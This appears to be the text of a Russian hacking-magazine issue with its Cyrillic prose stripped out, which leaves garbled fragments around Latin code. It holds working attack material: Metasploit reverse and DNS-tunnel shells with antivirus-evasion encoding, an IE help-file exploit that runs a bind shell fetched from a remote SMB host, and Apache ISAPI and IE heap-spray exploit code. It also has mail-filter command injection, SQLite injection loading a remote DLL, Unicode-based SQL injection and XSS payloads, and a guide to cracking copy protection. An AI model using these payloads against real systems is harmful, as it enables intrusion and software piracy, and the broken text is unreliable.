!.
LiveCD .
de-ice.hackerdemia.com/doku.php.


-,
. ,
? , . cracker
,
, . crackmes,
, , www.crackmes.de www.
tdhack.com. : ,
, ,
-

036

,
. ,
,
.
,
cracking,
Cracking ][ #08/2005.

crackmes'.

,
, , -
. IE8, Vista/W7, , IE
6/7 XP
. : ,
?
Internet Explorer Collection (finalbuilds.edskes.
net/iecollection.htm).
Internet Explorer

.
IE ,
. ,

. ,
:
? ,
- :).
- , ,
www.oldapps.com oldversion.com,
. , ,
Winamp',
0.2 , .


- .
,
, . ?
,
,
.
,
, .
.z

S TEP T W I T T E R . C O M / S T E PA H


. Apple ,
Nexus One,
, .
, HTC
, , :
.
,
. . Google
: ,
. ,
?
?

, .
, .
? ,
. ,
- .
, - ,
.
,
, .

,
.
,

. ? , Asus W6F

,
. Synaptics, ..
. ,
, , ,
TouchPad V6.2.

Synaptics, , -

,
iPhone


, :
-
. , ,

(forums.hardwarezone.com.sg/showthread.
php?p=44505922).
HP,
!
,
,

.
:
!
Gestures ( ,
).

,
. Synaptics Scrybe (www.uscrybe.com),


gestures.
, : ASUS,
IBM, Dell, Samsung .. ,


BenQ. !
,
!
code.google.com
nihon-nukitescroll (code.google.com/p/nihon-nukite-scroll).

( ) .
, , , . z

037


GreenDog agrrrdog@gmail.com

Easy Hack
1

: -

:
Firewall .
, ,
. ,
, , ,
, backconnect . , . , DNS.
, ( ). - .
DNS, dnscat (- netcat).
:
DNS example.com,
. , somedata.example.com,
DNS-. 150 ,
, .
, ,
.

, ?!
, Ron dnscat
! metasploit.
,
. , !
, :
1. metasploit.
2. : skullsecurity.org/blogdata/dnscat-shell-win32.rb
( DVD).

3. metasploit modules/payloads/singles/windows/.
4. dnscat- metasploit,
:
) dnscat (skullsecurity.org/wiki/index.php/Dnscat);

: ,

EXE, ZIP, DLL ..

:
,
, ,
, -exe, -zip, -dll proxy. , , .
, . :

038

icecast_
header dnscat-
, , dnscat!
) sudo ./dnscat listen;
:
1. :
msf > use exploit/windows/http/icecast_header
2. dnscat-:
msf exploit(icecast_header) > set PAYLOAD windows/dnscat-shell-win32
PAYLOAD => windows/dnscat-shell-win32
3. :
msf exploit(icecast_header) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
4. DNS-:
msf exploit(icecast_header) > set DOMAIN example.org
DOMAIN => example.org
5. :
msf exploit(icecast_header) > exploit

dnscat- , ..
.
DNS, ,
primary dns IP .

1. .
, ,
. .
.
. .
2. .
, , . :
, , .
c - , jpeg
pdf, . exe, proxy


jpeg.
c php allow_url_fopen php.ini,
.
:
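<?php
// Fetches whatever URL the caller supplies (requires allow_url_fopen in php.ini)
echo $_GET['l'].'.'.$_GET['t'].'<br>'; // show the requested URL
$name=rand(1,100); // random name for the local copy
$file = file_get_contents($_GET['l'].'.'.$_GET['t']); // download the remote file
$fp=fopen($name.'.jpg','wb'); // store it under a .jpg extension
fputs($fp,$file); // write the contents
fclose($fp);
echo '<a href='.$name.'.jpg>download</a>'; // link to the stored copy
?>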

! :
http://127.0.0.1/jpg.php?l=http://download.qip.ru/
qip8095&t=exe

. .
-, . : . php.ini.
, , ,
php curl, .

:
. , . ,
metasploit.
1. smb relay.
, smb relay. 10 , -
, NTLM-,
, .
- .
( ), smb relay
man-in-the-middle , ..
,
.
.
(. ):
1. (attacker) (victim) .
2. (target) 8-
.
3. .
4. .
5. .
, ,
Microsoft 2 .
, Metasploit , smb relay. web-:
1. Microsoft Windows SMB Relay Code
Execution.
2. payload. , generic/shell_bind_tcp.
3. LPORT,
.
4. SMBHOST ip- , .
5. .

, smb-,
smb-host
.
2. smb sniffer.
smb relay ,
. ,

metasploite

, metasploit capture/smb.
:
1. :
msf > use auxiliary/server/
capture/smb
2.
msf auxiliary(smb) > run

smb relay ,
smb- ,
1122334455667788, .
smb relay .
,
? .
:
e-mail, html-
:
<img src="\\Attacker\SHARE\
file.jpg">

,
,

.
, , XSS ,
, DNS, ARP.
, securitylab.ru/contest/212100.php securitylab.ru/analytics/362448.php:
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;

039

Windows NT 5.1; MyIE2)\r\n";


$request .= "Host: " . $host . "\r\n";
$request .= "Content-length: ". strlen($cmd) . "\r\n";
$request .= "Connection: Keep-Alive\r\n";
$request .= " Cache-Control: no-cache\r\n";
$request .= "\r\n";
$request .= $cmd . "\r\n";
$socket = fsockopen($host, $port ? $port : 80);
fputs($socket, $request);
while(!feof($socket))

: CMS
.

: .
cms. : , Google,
cms .
:
1.
2.
3.
4.
5.
7.

html- .
java-.
robots.txt.
.
http- cookies.
(ERROR404).

, - , -, :
builtwith.com
webmastercoffee.com

echo fgets($socket, 1024);


fclose($socket);
}
?>

3. :
http://localhost/input.php?host=www.example.
com&script=index.php?page=&cmd=phpinfo()

4. :).

2ip.ru

cms,
, ,


.
,
,

.

Wappalyzer
cms Wappalyzer
firefox.
, ,
.
.
Wappalyzer. :
1. Wappalyzer.
2. zip .
3. \chrome\content\overlay.js.

: IP-
.

:
- . - . ,
. tcp/ip
,
, . ,
.
, IP ,
/ NAT. .
, , XSS -
, .
IP. ,
, XSS-, .
, , , PHP-
, , IP .
,
NAT. . ?
! Metasploit.
, Decloak: DeAnoynmized.
, , php (
) :
<?php $id=md5("blablabla" . $_SERVER['REMOTE_ADDR'] .
$_SERVER[REMOTE_PORT] . time() . " blablabla ");

040

http://decloak.net/report.html
$log= $id."-".$_SERVER['REMOTE_ADDR']."\r\n";
$fp=fopen("iplog.txt","a");//
fputs($fp, $log); //
fclose($fp);
?>
<html><head><meta http-equiv="Content-Type" content="text/
html; charset=utf-8" />
<title> </title></head><body>
<p><img src="001.gif" width=200 height="153" /></p>
<iframe src=http://decloak.net/decloak.html?cid=<?php echo
$id; ?>&word=0&itunes=0&quicktime=0" width="0" height="0"
scrolling="no"></iframe> </body></html>

, , ,
, decloak.net/decloak.html. IP
decloak.net/report.html?cid=<unicid>&format=text

<unicid> 32 id .
iplog.txt, :


d50712b92c93b98d063735612a6b78ea-127.0.0.1
id IP ,
&word=0&itunes=0&quicktime=0

,
decloak IP-,
.
IP, , XSS,
, 32- :
<iframe src=http://decloak.net/decloak.html?cid=<unicid>&word=0&
itunes=0&quicktime=0 width=0 height=0 scrolling=no></iframe>

ID.
,
jpeg, , .htaccess , jpeg php.
AddHandler application/x-httpd-php .jpeg

, Tor-,
IP-.
, ,
,
decloak.net.

: ,
.

:
- .
. , .
.
1. - . -,
.
2. .
3. , , . ,
100% .
4. , . Metasploit.
Metasploit : ,
- . , , -
Metasploit , .
msfpayload windows/shell/reverse_tcp LHOST=192.168.146.128,L
PORT=5555 X > reverse.exe

, msfconsole,
Metasploit payload.
exe- , 5555
192.168.146.128. X ,
exe-. :
C
P
J
V
y
R


Perl
JavaScript
VBA
Ruby

. , . :
msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_
tcp LHOST=192.168.146.128 LPORT=5555 E

msfcli Metasploit.
, reverse.exe , 5555
. ,
payload Metasploit .
, , . reverse.exe
21 41, virustotal.com (. ).
? Metasploit msfencode. , ,
, -.
. :

reverse.exe. 21 41
PORT=5555 R | msfencode -c 5 - e x86/shikata_ga_nai -x notepad.
exe -t exe > reverspad.exe

msfpayload ,
, msfencode.
:
-c 5 -e x86/shikata_ga_nai (5 ) shikata_ga_nai:
-x notepad.exe msfencode - -
. , notepad.exe ,
.
-t , .. executable.
. Msfencode
PE- , , .text
. exe-,
.
. -, -, -, reverspad.exe -- notepad.exe.
, .
. , ,
. ,
reverspad.exe (. ). , msfencode,
. z
reverspad.exe. 2 41.

msfpayload windows/shell/reverse_tcp LHOST=192.168.146.128,L




, Digital Security dookie@inbox.ru

, Acrobat Reader .

01


INTERNET EXPLORER

TARGETS
Internet Explorer 7/8
Windows XP
Windows 2000/2003
BRIEF

(Maurycy Prodeus),
Internet Explorer.
, MsgBox(), Visual Basic-,
.hlp-. , <F1> MsgBox().
, , WebDAV.
, .hlp
, ExecFile().
EXPLOIT
,
. ,
HLP <F1>.
,
,
, , , - , / . ,
ie_winhlp32. , ,
80 , URIPATH

042

ROP .

/. . ,

. , ,
. , ,
HLP- EXE,
.
HLP-. Microsoft Help Workshop
4 ( ). HLP-
RTF-, Worde.
(->). . : $ ZLO, # IDH_1

. !.
F1

. ,
free, IP 10.10.10.10. :
!ExecFile(cmd,/c net use z: \\\\10.10.10.10\\free)
!ExecFile(cmd,/c wscript z:\\exec.vbs)

, ,
exec.vbs. exec.vbs:
Dim WshShell,oExec
Set WshShell = wscript.createobject("wscript.shell")
Set oExec = WshShell.Exec("z:\zlo.exe")

. ,
? , ,
,
cmd.exe, ,
. ,
wscript , , ,
cmd.exe. , , . cygwin
:
msfpayload windows/shell_bind_tcp LPORT=4444 X > zlo.exe

HLP-, Microsoft Help Workshop,


File, RTF. Map : IDH_1=1.
Compile .hlp.
free, HLP, EXE VBS . , , :
<html>
<script type="text/vbscript">
big = "\\10.10.10.10\free\EXEC.HLP"
MsgBox "please press F1 to save the world", ,
"please save the world", big, 1
MsgBox "press F1 to close this annoying popup", ,"",
big, 1
</script>
</html>

<F1>
, 4444 . big HLP ,
, , (, IDH_1=1?).

SOLUTION
Microsoft <F1>.
, :
echo Y | cacls "%windir%\winhlp32.exe" /E /P everyone:N

043

: "pwn-isapi". ,
.
:
...
//
serverIP = string(argv[1]);
isapiDLL = string(argv[2]);

, 0-day IE6/7.

. Internet Explorer (-> ->->->).

02


APACHE ISAPI_
MODULE

TARGETS
Apache <= 2.2.14
Windows XP
Windows 2000/2003
BRIEF
isapi - Apache Windows
, -
IIS. . , -
.
DLL-, , ,
cgi-bin. DLL : "AddHandler isapi-handler .dll".
ISAPI-,
, . ,
ISAPI- (RESET-), , .
, isapi, , ,
, ,
.
EXPLOIT
- (Brett Gervasoni), ,
. POST- ISAPI- , ,
,
. , -http-. A (0x41 INC ECX:
NOP) . , ,
, ,
ISAPI. ,
,
-. ,

, , , .
, sos.txt .

044

// ''
memset(accept, 'A', 170);
memset(referer, 'A', 732);
memset(cookie, 'A', 5375);
memset(random, 'A', 7603);
memset(postData, 'A', 23378);
memset(footer, 'A', 298);
//
triggerVuln = "POST /cgi-bin/" + isapiDLL + " HTTP/1.0\r\n"
"User-Agent: AAAAAAAA\r\n"
"Pragma: no-cache\r\n"
"Proxy-Connection: Keep-Alive\r\n"
"Host: " + serverIP + "\r\n"
"Content-Length: 40334\r\n\r\n" +
string(footer);
//
payload = "POST /cgi-bin/" + isapiDLL + " HTTP/1.0\r\n"
"Accept: " + string(accept) + "\r\n"
...
"Proxy-Connection: Keep-Alive\r\n"
"Okytuasd: " + string(cookie) + string(shellcode)
+ "\r\n" // -
"Asdasdasdasdasd: " + string(random) +
string(shellcode) + "\r\n"
"Asdasda: " + string(random) +
string(shellcode) + "\r\n"
"Sewrwefbui: " + string(random) +
string(shellcode) + "\r\n"
"Qdfasdernu: " + string(random) +
string(shellcode) + "\r\n"
"Cdffew-asdf: " + string(random) +
string(shellcode) + "\r\n"
...
"Content-Length: 25054\r\n\r\n" +
string(postData) + "CCCC" +
string(shellcode) + "BBBB" + string(footer);
//
...
//createConnection -
if (createConnection(serverIP, SERVER_PORT) == 1)
{
printf("- an error occurred connecting to the server\n");
return 1;
}
...
linger_data.l_onoff = 0;
linger_data.l_linger = 0;
// RESET
setsockopt(sock, SOL_SOCKET, SO_LINGER,

BRIEF
0day. ,
IE 6/7. , .
iepeers.dll, ,
, .
EXPLOIT
,
, McAfree,
www.topix21century.com.
. , , ,
( 0day).
:
<button id='trigg' onclick='attack();'
style='display:none'></button>

ISAPI exploit.

(char*)&linger_data, sizeof(linger_data));
setsockopt(sock, SOL_SOCKET, SO_DONTLINGER,
(char*)&linger_data, sizeof(linger_data));
...
sendTransmission(triggerVuln); //
Sleep(2000); // 2 , Apache
WSACancelBlockingCall(); // RESET
...
// , ,
//
...
sendTransmission(payload); // POST
-

, , DEP. DEP,
DoS.

<script language='javascript'>
function attack()
{
heap_spray();
// heap-spray,
var obj = document.createElement('body');
//
obj.addBehavior('#default#userData');
document.appendChild(obj);
//
//
for (i=0; i<10; i++)
{ //
obj.setAttribute('s',window);
//
}
window.status+='';
// windows
}
document.getElementById('trigg').onclick();
//
}
</script></body></html>

,
,
window, .

SOLUTION
- 2.2.15. ,
ISAPI-, .

SOLUTION
IE6/7 DEP. ,
. ,
. Internet Explorer 8 .
Microsoft, .

03

04

INTERNET
EXPLORER

TARGETS
Internet Explorer 6/7
Windows XP/Vista
Windows 2000/2003/2008

LIBTIFF
ACROBAT READER

TARGETS
Acrobat Reader 9.0-9.3/8.0-8.2
Windows XP/Vista
Windows 2000/2003/2008


BRIEF
PDF ,
, . Acrobat Reader ,
. Flash.
, , PDF
. 2010
PDF . , , .
EXPLOIT

Acrobat Reader. , JavaScript, , , .
libTiff. LibTIFF,
,
TIFF. ,
Adobe libTiff, ,
- , . ,
2006 .
,
*nix . Acrobat Reader

2006 PDF-
(, TIFF *nix, , , ).
DotRange.
TIFFFetchShortPair() libTiff , N
( ) .
_TIFFmemcpy(cp, tif->tif_base + dir->tdir_offset, cc);

cp : cc, . ,
cp , . ,
TIFF- DotRange ,
return-oriented programming (ROP).
-, - . ,
,
.
, -,
, .
, ,
.
TIFF-
, ,
. , .
.
538 , , ,
TIFF_OFSET, ,
.
gen_tiff(). :
tiff += "\x00\x00\x50\x01\x03\x00\xCC\x00\x00\x00\x92\x20\x00\x00\x00\x00"


DotRange (\x50\x01 = 0x150) 0xCC. , , 0x98,


. ,
, tiff. ,
ROP-
, ,
.

SOLUTION
Acrobat Reader,
9.3.1.

05

ROOT APACHE SPAMASSASSIN


MILTER PLUGIN

TARGETS
spamass-milter < 0.3.1
BRIEF
Milter Plugin Sendmail,
SpamAssassin, , ,
, .
, ,
, .
Kingcope, : , , , xscreensaver (symlink), MySQL (format string), 0day
Samba (directory traversal) .

, ,
.
: ,
popen().
EXPLOIT
():
sfsistat
mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
{
    struct context *sctx = (struct context*)smfi_getpriv(ctx);
    SpamAssassin* assassin = sctx->assassin;
    FILE *p;
#if defined(__FreeBSD__)
    int rv;
#endif
    debug(D_FUNC, "mlfi_envrcpt: enter");
    if (flag_expand)
    {
        /* RCPT TO: */
        char buf[1024];
        char *fmt="%s -bv \"%s\" 2>&1";
#if defined(HAVE_SNPRINTF)
        snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]); //
#else
        /* Kingcope , snprintf. ,
        , ?*/
        sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
        // RCPT TO: buf
#endif
        debug(D_RCPT, "calling %s", buf);
#if defined(__FreeBSD__)
        rv = pthread_mutex_lock(&popen_mutex);
        if (rv)
        {
            debug(D_ALWAYS, "Could not lock popen mutex: %s", strerror(rv));
            abort();
        }
#endif
        /* */
        p = popen(buf, "r");
        // pipe
        if (!p)
        {
            debug(D_RCPT, "popen failed(%s). Will not expand aliases", strerror(errno));
            assassin->expandedrcpt.push_back(envrcpt[0]);

popen,

execl(shell path, "sh", "-c", <
popen>, (char *)0). fmt
,
stderr,

|, , ,
,
. :
$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me@me.com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 Ok

popen.
root+:, ,
bv sendmail.
touch /tmp/foo. , . , .
:
sendmail bv root+:|touch /tmp/foo 2>&1.

, -

$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo

SOLUTION
, .



d0znp ONsec

,

SQLITE

, .
,
. ,
. , ,
. ,
SQLite .

SQLite
, ,

3306, .
-

. :
,
.
,
.
,
SQLite.
: Symbian, Apple iPhone,


Google Android ,
.
,
, -
SQLite Wordpress, phpBB3
. -,
PHP .

SQLITE -

SQLite ,
PHP.
PHP

php_sqlite3 php_sqlite (
3 2, )
php_sqlite3 + php_pdo_sqlite.

, ,
,
.
,
. ,
SQLite3Stmt
prepared statement. ,
MySQL (
Eleanor CMS :) ).
. ,
,
. , . Prepared
Statements , ,
FROM table.
mysql_real_

SQLite
,
HTML, XSS.
escape_string()

,
version(). SQLite sqlite_version() ( )
:
sqlite> select sqlite_version();
3.6.23

substr(X,Y)
substr(X,Y,Z): ,
, .
1.
sqlite> select substr('abcdefgh',1,2);
ab


0x00, .
SQLite zeroblob(N). N
0x00 .
,
trim(X,Y).
,
X.
sqlite> select trim('aa12312asd123asda','asd');

, .
, , SQLite .

, !

.
.
MySQL, , sqlite.
org/lang_comment.html
:
--comment
/*comment*/


*/ .
:
SELECT * FROM temp WHERE id=injection-here
/* and groud_id=5

.
, :
SELECT id, text FROM data WHERE id='5'
UNION SELECT user, pass FROM user '
SELECT id, text FROM data WHERE id='5'
UNION SELECT user, pass FROM user '''''
'
SELECT id, text FROM data WHERE id='5'
UNION SELECT user, pass FROM user "
SELECT id, text FROM data WHERE id='5'
UNION SELECT user, pass FROM user """ "

HTTP://WWW
links
oxod.ru
.
.
,
.
http://sqlite.
org/lang.html
SQL
SQLite.


.
sqlite.org/limits.
html

SQLite.
.
sqlite.org/faq.
html



.
sqlite-crypt.com/
documentation.htm


.
AES 1 .

12312asd123

.
,
SQLite, sqlite_compileoption_get(N).
, .
sqlite> select sqlite_compileoption_get(0);
ENABLE_FTS3
sqlite> select sqlite_compileoption_get(1);
ENABLE_RTREE
sqlite> select sqlite_compileoption_get(2);
TEMP_STORE=1
sqlite> select sqlite_compileoption_get(3);
THREADSAFE=0

, concat() char()
-
.

SQLite ,
.
mysql_escape_string. sqlite_escape_
string() sqlite3_escape_
string(). ,
. , SQLite . , .
:
1. \ - / * % _ sqlite_escape_string sqlite3_
escape_string .
2. . .
:

WARNING

warning
!


!
,



1. :
$query = 'SELECT data FROM tabl1 where
id="'.sqlite_escape_string($id).'" ';

$query = 'SELECT data FROM tabl1 where
id="'.sqlite3_escape_string($id).'" ';

:
test.php?id=1/**/UNION/**/SELECT/**/password/**/FROM/**/USERS/**/LIMIT/**/1

2. sqlite_escape_string() sqlite3_escape_
string() HTML
XSS :
<input type='text' value='test''
onclick=javascript:alert(22) '>

3. LIKE, , %
-.
4. \, :
$query = "SELECT data FROM tabl1 where
id='".sqlite_escape_string($id)."'";

$query = "SELECT data FROM tabl1 where
id='".sqlite3_escape_string($id)."'";

SQLite .
SQLITE_MASTER,
.
:

test.php?id=\

SQL . ,

HTML, HTML .

MySQL ,
INFORMATION_SCHEMA.
. SQLite
-

CREATE TABLE sqlite_master (
type TEXT,
name TEXT,
tbl_name TEXT,
rootpage INTEGER,
sql TEXT
);

. ,

SQL. SQL, .

, sqlite_escape_
string()

, . . , !
,
,
,
SQLITE_TEMP_MASTER.


LOAD_EXTENSION(). , ,
, SQLite
, .

,
.
:
The load_extension(X,Y) function loads SQLite extensions out of the shared library file named X using the entry point Y. If Y is omitted then the default entry point of sqlite3_extension_init is used. The extension can add new functions or collating sequences, but cannot modify or delete existing functions or collating sequences because those functions and/or collating sequences might be used elsewhere in the currently running SQL statement. To load an extension that changes or deletes functions or collating sequences, use the sqlite3_load_extension() C-language API.

SQL.

Nokia, Mozilla, SQLite
.

,
-.
, ,
sqlite3_
extension_init(). -
,
, SQLite, ,
- C++ API.
,
?!

SQLite Win32
:
#ifdef HACK
//'select load_extension('sqlite_1251.dll', 'hack');
DWORD WINAPI ThreadProc(sqlite3 *db)
{
    Sleep(3000);
    sqlite3_extension_init(db,0,sqlite3_api);
    return 0;
}
int __declspec(dllexport) __cdecl hack()
{
    HANDLE hThread;
    SQLITE_EXTENSION_INIT2(pApi)
    hThread = CreateThread(NULL,0,ThreadProc,db,0,0);
    CloseHandle(hThread);
    return 0;
}
#endif

Win-
LOAD_EXTENSION(C:/boot.ini).


: theli.is-a-geek.org/blog/
development/sqlite_hack.1024px#comment_
anchor. ,
,
.
,
, -, , ,
-, - .
,
-
-. INTO OUTFILE,
INTO DUMPFILE, LOADFILE()
SQLite . - Win-,
.
SMB:
SELECT data FROM tbl1
WHERE id=5/**/UNION/**/ALL/**/SELECT/**/LOAD_EXTENSION("\\10.10.10.10\evil-lib.dll","bindShell");

,

. , , :
SELECT LOAD_EXTENSION(
'/file/that/does/not/exists');

:
Error: The specified module could
not be found.

, Win :
Error: The specified procedure
could not be found.

, :
Error: %1 is not a valid Win32
application.

,
,

. , ,
,
.

. ,
.

, -,
SQLite. ,

, , SQLite,
. ,
oxod.ru z



ELF ICQ 7719116

VS


,
, . ,
,
StarForce Protection System, . , !

( ),


! ,

:
if Enter_User_key = Real_Programm_Key then
Call Registration_Success (Enter_User_key)
else
MessageBox.Show ("Wrong KEY!")
end if

100% ,
. ,
shareware-


!
- .

Total Video Converter 3.12.
,
( CMP, JMP
), (
),
(onOk). ,
API
MessageBoxA, ,
(
) MessageBox (
42151) (JMP 421508). !
:).
, !

- ,

! ,
(, ,
, ),
( !).
,
,
, , . ?
,

!

( !)
!
, Trial
Free .

? , .

:
:)

, .
, :
(
, , )
;
(Trial-, )
;

;

; :
() .
, .
UPX. ,
,
dll .
, , . , .
,
.
HDTunePro 3.50.
: -
, 1 .
, 15 -
. , (
12 ,
16, ?!; , , .
, ,
)
EAX (, 15-0=15). !
!
world-famous CnC3:
Tiberium Wars Electronic Arts ( ).
,
exe-,
. ,

, (
). .
! ,
- Secure Mode Failed (-,
!). :
,
! ! ,
Electronic Arts ,
(,
)

! , cnc3.exe , GetDriveTypeA,
CMP EAX, 5, EAX
API .
.
, . ? ,
cnc3game.dat. ,
!
( ) ,
( ) ,
, cnc3.exe!
cnc3game.dat ( \RetailExe\[ ]\
cnc3game.dat) , !
IsDebuggerPresent (, ). ,
(: !) BlueSoleil
IVT Corporation.
:
12(!) (
). ! - ( ) .
API LoadString
,

, LoadString
.
!
IsDebuggerPresent OutpudDebugString.
,
. ! ,
.

Evaluation (,
About),
!

WARNING

warning
,


,
,


,
,
!

HDTunePro_ELF edition .
)

,
Evaluation BsSDK.dll (,
, .
,
), ,
Evaluation ,

, , ,
EAX !
,
MessageBoxA. , ,
.
:).
,
, ,
.


TVC! :


, . :

.
( BlueSoleil),
.

.
(
)
(, ASProtect) .
. ,
, ,


,
, 100%
, .
,
,
. , .
.


. ,
(,
OEP).
ResourceBuilder.
dll
ASProtect.


OEP, ?

.
(, ,
), ,
,
.
.

,

,

.
,

! , ,
StarForce
( ): ,
? ,
.

: ,

(, ).
, ,

, StarForce, .
, ,
(,
), .
, ,
, !


.
!
SoftIce,
, (
) :).
, ,
,


!
,

( Electronic
Arts) :
3ds
Studio Max! ,
. ! ,
,
,
,
.
- .

StarForce
,
, ,
,
( ?

).
,
- ,


. !
,
:

! ,

.
! ,
- ,
, . ,
appdrvrem.exe IdaPro .
SafeDisk
.
StarForce ,
, SafeDisk 4.x

IsDebuggerPresent?
IsDebuggerAbsent!
( ),
42h
41h
.
.
!
.
( )
.
.

,
;
, /

-
;

;

,
!
:
-
,
.
StarForce
,
(, ,
), ()

, (,
protect.dll OllyDbg).
: -


( )
.
protect.dll ,
,
,
.
:
KeBugCheckEx,

, ( ),
! !

,

.
.
, : ,


.

,
.
! 100%
,

. -

.

.
:
,
-



RAZ0R HTTP://RAZ0R.NAME

KeBugCheckEx,

,

, ResourceBuilder
.



regkey.bin.

.

? ,

:
[ ] = [
] * [
] / [
(, ,
)] * [
]) * [ ]

BlueSoleil .

. ,
, , .

,
.
-

.

( Tiberium Wars

,
),

?
:
( ), ( ), ,
z

IsDebuggerPresent? .



AMS ax330d@gmail.com

Unicode-
, , Unicode,
, ,
. ! , ,
, .

, , ,
.
.


. 60 ASCII American
Standard Code for Information Interchange
(
), 7-


.

ASCII
.
ASCII-

. , ,
.
,

. 8-

.
ISO (International Organization
for Standardization,
) , ISO 8859.
UCS
(Universal Character Set,
). ,
UCS Unicode.

Google
Unicode

, . , Unicode
.
Unicode 5.2.
- .
, ,
,
. , ,
.

- UNICODE

, ,
Unicode .
,
.
, Unicode?
.
1 100 000 ,
U+0000 U+10FFFF. ! Unicode
, ,
.
(, 0041 A) ,
, .
Unicode , UTF (Unicode Transformation Formats,
Unicode). :
UTF-7:

. RFC 2152. Unicode, .
UTF-8:
-. ,
1 4 .
, ASCII. U+0000
U+007F.
UTF-16: 2
4 . 2 . UCS-2 , 2
BMP.
UTF-32: 4
, 32 .
21 , 11 .

, 32-

PUNYCODE
.
DNS - ,
, DNS
ASCII-.
, ,
Unicode- .
.
xn-- Punycode.
, .ru Punycode :
xn--80akozv.ru. Punycode RFC 3492.

.
UTF-32 UCS-4,
.

, UTF-8 UTF-32 ,

UTF-16.
17 , 65536
. , .
BMP Basic MultiPlane.
UTF-16 UTF-32

, UTF-16LE/UTF-32LE, UTF16BE/UTF-32BE, . ,
LE little-endian, BE big-endian. -
.
U+FEFF, BOM,
Byte Order Mask. BOM
UTF-8, .
.
, - . ,
.
4 :

INFO

info
IDNA IDN in
Applications (IDN
),
,

,

.
IETF,


RFC
IDNA2003 RFC
3490.
.

Normalization Form D (NFD):


.
Normalization Form C (NFC):
+ .
Normalization Form KD (NFKD):
.


Bidi-

- mozilla.org FireFox IDND

Normalization Form KC (NFKC):


+ .

.

.
,
.

.
, .
, ,
.

, - .


,
,
.
,
,
. Unicode ,
, ,
,
. ,

. ,
- , .

IP/ARP/DNS ,
. -

,

.
, o
0, 5 s. , .
-
2000 PayPal, www.unicode.org.
.

Unicode, IDN, Internationalized Domain
Names (
). IDN
.

, ,
! ,
. , . ,
, , .
, IDN-.
, homograph attack, ,
(,
).
,
.

. ,
.

IDNA2003, , 2010 ,
IDNA2008.

UTF-8

IDNA2003,
-.


. , Punycode
-
, .
.
Unicode .
- Unicode-, UC-Simlist (Unicode Similarity
List, Unicode). !
,
. , , .
- . ,
,
?
, , evilexe.
txt. ! -
evil[U+202E]txt.exe. ,
? , U+202E RIGHT-TO-LEFT OVERRIDE,
Bidi ( bidirectional)
, ,
.
. RLO, ,
RLO, .
- Mozilla Firfox cve.mitre.org/cgi-bin/
cvename.cgi?name=CVE-2009-3376.

,
(non-shortest form) UTF-8,
. PHP . ,
.
utf8_decode().
. ,
PHP-:
<?php
// ... 1
$id = mysql_real_escape_string($_GET['id']);
// ... 2
$id = utf8_decode($id);
// ... 3
mysql_query("SELECT 'name' FROM 'deadbeef'
WHERE 'id'='$id'");

XSS-

, . ,
SQL-. ,
:
/index.php?id=%c0%a7 OR 1=1/*

,
. , . ,
. ,
? ,
.
%c0 %a7 , 11000000 10100111 .
00100111.
UTF-8.

. , (
, ), ,
.
, 110, ,
, 1 .
1
0. ! 11000000 10100111,
%c0%a7.
,
, , ,
addslashes(), mysql_real_escape_string(), magic_
quotes_qpc. ,
. ,
PHP UTF-8 .
,
.

. :
<?php
/**

HTTP://WWW
links
unicode.org

Unicode.

.
macchiato.com/
main

Unicode.
fiddler2.com/
fiddler2 Fiddler, ,
HTTP.
websecuritytool.
codeplex.com
Fiddler

HTTP-.
lookout.net
,
Unicode,

.
sirdarckcat.blogspot.com/2009/10/
couple-of-unicodeissues-on-php-and.
html
sirdarckat
PHP Unicode.
googleblog.blogspot.com/2010/01/
unicode-nearing-50of-web.html



Unicode.


<img alt='I am xxx?rc='http://


src=javascript:onerror=alert(/
xss/)//' />

* UTF-7 XSS PoC


*/
header('Content-Type: text/html;
charset=UTF-7');
$str = "<script>alert('UTF-7
XSS');</script>";
$str = mb_convert_encoding($str,
'UTF-7');
echo htmlentities($str);

,
,
. :
+ADw-script+AD4-alert('UTF-7 XSS')+ADsAPA-/script+AD4-

. ,

.
, .
,
,
.
<meta http-equiv="Content-Type" content="text/html; charset=UTF-7">

, ,

UTF-8.
Google,
XSS-,
UTF-7.
Google sla.ckers.org/forum/
read.php?3,3109.


: .
,
.
: , , PHP.
, , (ill-formed),

, U+FFFD, ..,
. -
, .
, PHP UTF-8
.

JavaScript-, SQL-.
,
Eduardo Vela aka sirdarckcat,
, , .
,
, :
<?php
// ... ,
$name = $_GET['name'];
$link = $_GET['link'];
$image = "<img alt='I am $name'
src='http://$link' />";
echo utf8_decode($image);

:
/?name=xxx%f6&link=%20src=javascript:onerror=alert(/xss/)//

, PHP
:

? $name
UTF-8 0xF6,
utf8_decode()
2 , . http:// , JavaScript-
. Opera,
,
,
.
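Added example, not code from the article: a strict UTF-8 well-formedness check that rejects both byte sequences discussed above, the non-shortest form `%c0%a7` and the stray `0xF6` lead byte, shown next to a lenient two-byte decode that turns `C0 A7` into an apostrophe. Function names and the sample inputs are constructed for the illustration; the byte ranges are those of RFC 3629.

```c
/* Added example, not code from the page. Strict UTF-8 validation (RFC 3629
 * byte ranges) beside a lenient two-byte decode. All names are hypothetical. */
#include <stddef.h>
#include <stdio.h>

/* Lenient decode of a two-byte sequence: takes the payload bits and never asks
 * whether the code point needed two bytes at all. */
unsigned lenient_decode2(unsigned char b0, unsigned char b1)
{
    return ((unsigned)(b0 & 0x1F) << 6) | (unsigned)(b1 & 0x3F);
}

/* Returns 1 if s[0..n) is well-formed UTF-8, 0 otherwise. Rejects overlong
 * forms, surrogates, code points above U+10FFFF and truncated sequences. */
int utf8_wellformed(const unsigned char *s, size_t n)
{
    size_t i = 0;

    while (i < n) {
        unsigned char b = s[i];
        unsigned char lo = 0x80, hi = 0xBF;  /* range of the first continuation */
        size_t need;                         /* continuation bytes expected */

        if (b <= 0x7F) { i++; continue; }
        else if (b >= 0xC2 && b <= 0xDF) need = 1;    /* C0 and C1 are overlong */
        else if (b == 0xE0) { need = 2; lo = 0xA0; }  /* below A0: overlong */
        else if (b == 0xED) { need = 2; hi = 0x9F; }  /* above 9F: surrogates */
        else if (b >= 0xE1 && b <= 0xEF) need = 2;
        else if (b == 0xF0) { need = 3; lo = 0x90; }  /* below 90: overlong */
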